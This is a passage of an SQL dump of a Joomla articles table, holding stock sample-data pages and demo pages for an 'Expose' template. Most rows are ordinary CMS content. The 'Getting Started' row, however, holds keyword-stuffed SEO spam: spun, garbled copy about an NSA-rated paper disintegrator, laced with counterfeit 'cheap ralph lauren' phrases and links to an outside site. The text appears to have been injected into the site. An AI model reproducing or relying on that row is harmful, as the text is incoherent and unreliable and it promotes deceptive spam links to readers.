web.</p>\r\n<p>The basic Joomla! installation will let you get a great site up and running, but when you are ready for more features the power of Joomla! is in the creative ways that developers have extended it to do all kinds of things. Visit the Joomla! Extensions Directory to see thousands of extensions that can do almost anything you could want on a website. Can\'t find what you need? You may want to find a Joomla professional on the Joomla! Resources Directory.</p>\r\n<p>Want to learn more? Consider attending a Joomla! Day or other event or joining a local Joomla! Users Group. Can\'t find one near you? Start one yourself.</p>',1,19,'2011-01-01 00:00:01',736,'Joomla!','2013-02-03 15:28:31',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"left\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,4,'','',1,58,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(21,119,'Getting Help','getting-help','<p><img class=\"image-left\" src=\"administrator/templates/hathor/images/header/icon-48-help_header.png\" border=\"0\" /> There are lots of places you can get help with Joomla!. In many places in your site administrator you will see the help icon. Click on this for more information about the options and functions of items on your screen. Other places to get help are:</p>\r\n<ul>\r\n<li><a href=\"http://forum.joomla.org\">Support Forums</a></li>\r\n<li><a href=\"http://docs.joomla.org\">Documentation</a></li>\r\n<li><a href=\"http://resources.joomla.org\">Professionals</a></li>\r\n<li><a href=\"http://shop.joomla.org/amazoncom-bookstores.html\">Books</a></li>\r\n</ul>','',1,19,'2011-01-01 00:00:01',736,'Joomla!','2011-01-10 15:32:54',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',10,8,'','',1,20,'',0,'*',''),(22,120,'Getting Started','getting-started','<p>Mens ralph lauren shorts sem model 3 disintegrator on book display units now polo ralph lauren hoodies women <br /><br />This mens ralph lauren pants sem model 3 disintegrator <br /><br />Has polo ralph lauren hoodies women been evaluated cheap polo ralph lauren accessorie by nsa mens ralph lauren polo shirts outlet a lot of people wholesale polo ralph lauren mens hoodies standrad 3/32 screen, is introduced to the <br /><br />Ideal for wholesale womens ralph lauren polo shirts medium volume ralph lauren polo scarves devastation of paper, mens polo ralph lauren eye media and girls ralph lauren polo a <br /><br />Amount media polo ralph lauren sport shirt women in various waste ralph lauren men s hoodies particle sizes.Rated by the extensive mens ralph lauren long sleeve polo nsa at <br /><br />250 pounds per cheap ralph lauren polo handbags hr for High Security and up to 550 pounds ralph lauren polo bags for reasonable per hr for reasonable ralph lauren polo sport shirt for men Non <br /><br />Classified <b><a title=\"Ralph Lauren Polo Italia\" href=\"http://www.ghezzispa.it\">Ralph Lauren Polo Italia</a></b> usages.Along with a cheap ralph lauren long sleeve for men a single bag air evacuation waste <br /><br />Specify system.Mens ralph lauren polo custom fit store appropriate ralph lauren womens sweaters room size ralph lauren classic fit polo for men for this equiptment:Large ralph lauren womens sweaters 10 cheap polo ralph lauren sport shirt for women d x <br /><br />7 W x 6 the exact SEM 3 Disintegrator <br /><br />Is polo ralph lauren shoes for men sale a genuine light / mid ralph lauren mens jackets duty disintegrator, rendering ralph lauren shorts men high volume <br /><br />Destruction well over 600 lbs/hr wholesale ralph lauren polo mens shorts(At wholesale prices womens ralph lauren polo up to 250 cheap polo ralph lauren shorts for men lbs per hr at nsa <br /><br />Authorized, levels)And minimal mens ralph lauren dress shirts outlet space wishes.Search engine optimization disintegrators <br /><br />Deploy solid steel rotors with 5/8 thick chef cutlery and 10 hold down bolts <br /><br />Per silverware.This design generates ralph lauren shoes for men greater spinning inertia resulting <br /><br />In stronger cutting system with polo ralph lauren womens hoodies outlet increased cutting power to handle <br /><br />Denser and larger volumes of items.Sem coined organizations <br /><br />Disintegrator over 40 cheap mens ralph lauren classic fit polo issue.Today we have <b><a title=\"Ralph Lauren Italia\" href=\"http://www.ghezzispa.it\">Ralph Lauren Italia</a></b> an overabundance units in ralph lauren long sleeve shirts for women use in <br /><br />More maximum security growing than any other company.Search engine marketing <br /><br />Disintegrators use proven rotary knife mill techniques to destroy <br /><br />Any type of bulk material.When used with adequate waste sizing <br /><br />Computer monitor, all sem disintegrators meet ralph lauren sandals for men what\'s needed of:Ralph lauren hooded sweatshirts womens nsa/css <br /><br />02 02 for the wrecking of paper, NSA/CSS ralph lauren long sleeve polo men 04 02 for the polo ralph lauren boys exploitation <br /><br />Of eye media, nsa/css 04 01 for the polo ralph lauren sweaters for men deterioration of boys ralph lauren polo shirts key tape.<br /><br />Ralph lauren sport shirt women ralph lauren females long sleeve polo 3 disintegrator <br /><br />Capacity at cheap ralph lauren men s sport shirt 1 particle ralph lauren polo for females size polo ralph lauren scarves store:600 LBS with regard to Hr <br /><br />Mens ralph lauren polo shirts facility mens polo ralph lauren dress shirts at 3/32 cheap ralph lauren women s sport shirt nsa approved:250 LBS by Hr <br /><br />Trimming system with ralph lauren polo for boys solid steel rotor:5 ralph lauren polo jewelry sale Blade Cutting System(3 windmill / 2 Bed)<br /><br />Polo ralph lauren womens shirts cutting chamber ralph lauren women dresses web feed opening:10 x ralph lauren women s sandals in jamaica 12 <br /><br /></p>','',1,19,'2011-01-01 00:00:01',736,'Joomla!','2015-07-02 05:24:13',736,736,'2015-07-02 05:24:13','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,9,'','',1,366,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(24,122,'Joomla!','joomla','<p>Congratulations! You have a Joomla! site! Joomla! makes your site easy to build a website just the way you want it and keep it simple to update and maintain.</p>\r\n<p>Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. Joomla is open source, which means you can make it work just the way you want it to.</p>','',2,19,'2011-01-01 00:00:01',736,'Joomla!','2011-01-01 00:00:01',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,2,'','',1,67,'',0,'*',''),(35,133,'Professionals','professionals','<p>Joomla! 1.6 continues development of the Joomla Framework and CMS as a powerful and flexible way to bring your vision of the web to reality. With the administrator now fully MVC, the ability to control its look and the management of extensions is now complete.</p>\r\n','\r\n<p>Working with multiple template styles and overrides for the same views, creating the design you want is easier than it has ever been. Limiting support to PHP 5.2.4 and above and ending legacy support for Joomla 1.0 extensions makes Joomla! lighter and faster than ever. Languages files can now be overridden without having your changes lost during an upgrade. With the proper xml your users update extensions with a single click.</p>\r\n<p>Access control lists are now incorporated using a new system developed for Joomla!. The ACL system is designed with developers in mind, so it is easy to incorporate into your extensions. The new nested sets libraries allow you to incorporate infinitely deep categories but also to use nested sets in a variety of other ways.</p>\r\n<p>A new forms library makes creating all kinds of user interaction simple. MooTools 1.3 provides a highly flexible javascript framework that is a major advance over MooTools 1.0.</p>\r\n<p>New events throughout the core make integration of your plugins where you want them a snap.</p>\r\n<p>Learn about:</p>\r\n<ul>\r\n<li><a href=\"http://docs.joomla.org/What\'s_new_in_Joomla_1.6\">Changes since 1.5</a></li>\r\n<li><a href=\"http://docs.joomla.org/ACL_Tutorial_for_Joomla_1.6\">Working with ACL</a></li>\r\n<li><a href=\"http://docs.joomla.org/API16:JCategories\">Working with nested categories</a></li>\r\n<li><a href=\"http://docs.joomla.org/API16:JForm\">Forms library</a></li>\r\n<li><a href=\"http://docs.joomla.org/Working_with_Mootools_1.3\">Working with Mootools 1.3</a></li>\r\n<li><a href=\"http://docs.joomla.org/Layout_Overrides_in_Joomla_1.6\">Using new features of the override system</a></li>\r\n<li><a href=\"http://docs.joomla.org/API16:Framework\">Joomla! 1.6 AP</a>I</li>\r\n<li><a href=\"http://docs.joomla.org/API16:JDatabaseQuery\">Using JDatabaseQuery</a></li>\r\n<li><a href=\"http://docs.joomla.org/What\'s_new_in_Joomla_1.6#Events\">New and updated events</a></li>\r\n<li><a href=\"http://docs.joomla.org/Xml-rpc_changes_in_Joomla!_1.6\">Xmlrpc</a></li>\r\n<li><a href=\"http://docs.joomla.org/What\'s_new_in_Joomla_1.6#Extension_management\">Installing and updating extensions</a></li>\r\n<li><a href=\"http://docs.joomla.org/Setting_up_your_workstation_for_Joomla!_development\">Setting up your development environment</a></li>\r\n</ul>',1,19,'2011-01-01 00:00:01',736,'Joomla!','2011-01-09 16:41:13',42,736,'2015-07-02 05:23:26','2011-01-09 16:41:13','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',12,5,'','',1,93,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(48,146,'The Joomla! Project','the-joomla-project','<p>The Joomla! Project consists of all of the people who make and support the Joomla! Web Platform and Content Management System.</p><p>Our mission is to provide a flexible platform for digital publishing and collaboration.</p><p>The core values are:</p><ul><li>Freedom</li><li>Equality</li><li>Trust</li><li>Community</li><li>Collaboration</li><li>Usability</li></ul><p>In our vision, we see:</p><ul><li>People publishing and collaborating in their communities and around the world</li><li>Software that is free, secure, and high-quality</li><li>A community that is enjoyable and rewarding to participate in</li><li>People around the world using their preferred languages</li><li>A project that acts autonomously</li><li>A project that is socially responsible</li><li>A project dedicated to maintaining the trust of its users</li></ul><p>There are millions of users around the world and thousands of people who contribute to the Joomla! Project. They work in three main groups: the Production Working Group, responsible for everything that goes into software and documentation; the Community Working Group, responsible for creating a nurturing the community; and Open Source Matters, the non profit organization responsible for managing legal, financial and organizational issues.</p><p>Joomla! is a free and open source project, which uses the GNU General Public License version 2 or later.</p>','',1,19,'2011-01-01 00:00:01',736,'','2011-01-01 00:00:01',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,1,'','',1,4,'',0,'*',''),(53,151,'Using Joomla!','using-joomla','<p>With Joomla! You can create anything from a simple personal website to a complex ecommerce or social site with millions of visitors.</p><p>This section of the sample data provides you with a brief introduction to Joomla! concepts and reference material to help you understand how Joomla! works.</p><p><em>When you no longer need the sample data, you can can simply unpublish the sample data category found within each extension in the site administrator or you may completely delete each item and all of the categories. </em></p>','',1,19,'2011-01-01 00:00:01',736,'Joomla!','2011-01-01 00:00:01',42,736,'2015-03-12 12:34:21','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,7,'','',1,181,'',0,'*',''),(67,168,'What\'s New in 1.5?','whats-new-in-15','<p>As with previous releases, Joomla! provides a unified and easy-to-use framework for delivering content for Web sites of all kinds. To support the changing nature of the Internet and emerging Web technologies, Joomla! required substantial restructuring of its core functionality and we also used this effort to simplify many challenges within the current user interface. Joomla! 1.5 has many new features.</p>\r\n<p style=\"margin-bottom: 0in;\">In Joomla! 1.5, you\'\'ll notice:</p>\r\n<ul>\r\n<li>Substantially improved usability, manageability, and scalability far beyond the original Mambo foundations</li>\r\n<li>Expanded accessibility to support internationalisation, double-byte characters and right-to-left support for Arabic, Farsi, and Hebrew languages among others</li>\r\n<li>Extended integration of external applications through Web services</li>\r\n<li>Enhanced content delivery, template and presentation capabilities to support accessibility standards and content delivery to any destination</li>\r\n<li>A more sustainable and flexible framework for Component and Extension developers</li>\r\n<li>Backward compatibility with previous releases of Components, Templates, Modules, and other Extensions</li>\r\n</ul>','',2,9,'2011-01-01 00:00:01',736,'Joomla! 1.5','2011-01-01 00:00:01',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(68,170,'Module Variations','module-variations','<p>This theme comes with different module styles, badges and icons. For each module you can pick a style and combine it with an icon or badge to create your own unique look. Enter any available suffixes at Extensions → Module Manager → Module → Module Class Suffix.</p>\r\n','',1,77,'2011-06-11 09:19:46',736,'','2012-08-25 05:24:12',42,0,'0000-00-00 00:00:00','2011-06-11 09:19:46','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"1\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',11,5,'','',1,777,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(69,175,'Module Positions','module-positions','<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Roof</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Top</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Header</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Utility</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Feature</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>MainTop</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Breadcrumbs</h4></th>\r\n </tr>\r\n </thead>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"3\"><h4>Component Area</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>\r\n <table class=\"table table-bordered align-center\" style=\"background: #F0FFFF\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"4\"><h4>Content Top</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </td>\r\n </tr>\r\n \r\n <tr>\r\n <td>\r\n <table class=\"table table-bordered align-center\" style=\"background:#F8F8FF;\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Mainbody / Sidebar layouts below <i class=\"icon-arrow-down\"></i></h4></th>\r\n </tr>\r\n </thead>\r\n </table>\r\n </td>\r\n </tr>\r\n \r\n <tr>\r\n <td>\r\n <table class=\"table table-bordered align-center\" style=\"background: #FFFAF0;\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"4\"><h4>Content Bottom</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>MainBottom</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Footer</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Copyright</h4></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>1</td>\r\n <td>2</td>\r\n <td>3</td>\r\n <td>4</td>\r\n <td>5</td>\r\n <td>6</td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>Absolute</h4></th>\r\n </tr>\r\n </thead>\r\n</table>\r\n\r\n<table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"6\"><h4>OffCanvas</h4></th>\r\n </tr>\r\n </thead>\r\n</table>','',1,77,'2012-03-21 08:02:30',736,'','2013-09-14 19:37:06',42,0,'0000-00-00 00:00:00','2012-03-21 08:02:30','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',18,4,'','',1,191,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(70,176,'Expose Base Template','bootstrap-theme','<p>Base template is the solid theme based on Expose, our fast and slick theme framwork! It takes full advantage of all the latest Expose features like semantic xHTML markup, a nice and clean administration UI, Xpert Mega Menu and much more.</p>\r\n<p>Base template is an optimized and streamlined theme and serves as blueprint to build your own custom themes. It offers 4 different theme styles to get you started right away. Every bits of codes are well documented and we\'ve added Less files which make your customization more faster.</p>\r\n<h3 class=\"title\">Expose features</h3>\r\n<ul>\r\n <li>Flexible & powerful Layout system</li>\r\n liRsponsive layout</li>\r\n <li>Highly Customizable & full Controll over styling</li>\r\n <li>RTL support</li>\r\n <li>HTML5 and CSS3</li>\r\n <li>CSS and JS code compression</li>\r\n <li>Domination over Typography</li>\r\n <li>3 Menu system (Mega, Split, Dropine)</li>\r\n <li>Menu based component disabling</li>\r\n <li>Per Position module styling</li>\r\n <li>Built in jQuery.</li>\r\n <li>Cross-browser compatibility.</li>\r\n <li>Extensible widgets</li>\r\n</ul>','',1,77,'2012-03-21 08:44:19',736,'','2012-11-20 17:05:29',42,0,'0000-00-00 00:00:00','2012-03-21 08:44:19','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,3,'','',1,471,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(71,177,'Preset Styles','preset-styles','<p>Preset styles</p>','',1,77,'2012-03-29 17:34:46',736,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-29 17:34:46','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,2,'','',1,9,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(72,178,'Custom Styling','custom-styling','<h2 style=\"margin-bottom: 10px; border-bottom: 1px solid #ddd\">Preset styles</h2>\r\n<p>\r\n <img src=\"images/features/presets.jpg\" alt=\"Expose preset style\" class=\"pull-right\" />\r\n You can easily create your own preset styles. Just create a css file inside your templates <code>css/styles</code> folder and expose intellegent engine will automatically pull and show it in template settings.\r\n</p>\r\n\r\n<h2 style=\"margin-bottom: 10px; border-bottom: 1px solid #ddd\">Custom styling</h2>\r\n<p>\r\n <img src=\"images/features/customstyle.jpg\" alt=\"Custom Styling\" class=\"pull-right\" />\r\n If making preset style seems geeky to you hold on, Expose has custom styling feature right after it! Turn on the custom styling option and start changing the style. Expose made it as much easy as possible.\r\n</p>\r\n<p>\r\n If you need to insert your own background images just upload the image to <code>templates/TX_TEMPLATE_NAME/images/backgrounds</code> folder and refresh you template settings page. You will see your background image is listed under background dropdown menu.\r\n</p>\r\n\r\n<h2 style=\"margin-bottom: 10px; border-bottom: 1px solid #ddd\">Custom CSS</h2>\r\n<p>\r\n Unlike custom styling, if you need more control over <strong>CSS</strong>, go to <code>Developer</code> tab and start writing your css code there. You won\'t lost modifying a big template\'s css files.\r\n</p>','',1,77,'2012-07-13 09:56:40',736,'','2012-07-13 10:12:08',42,0,'0000-00-00 00:00:00','2012-07-13 09:56:40','0000-00-00 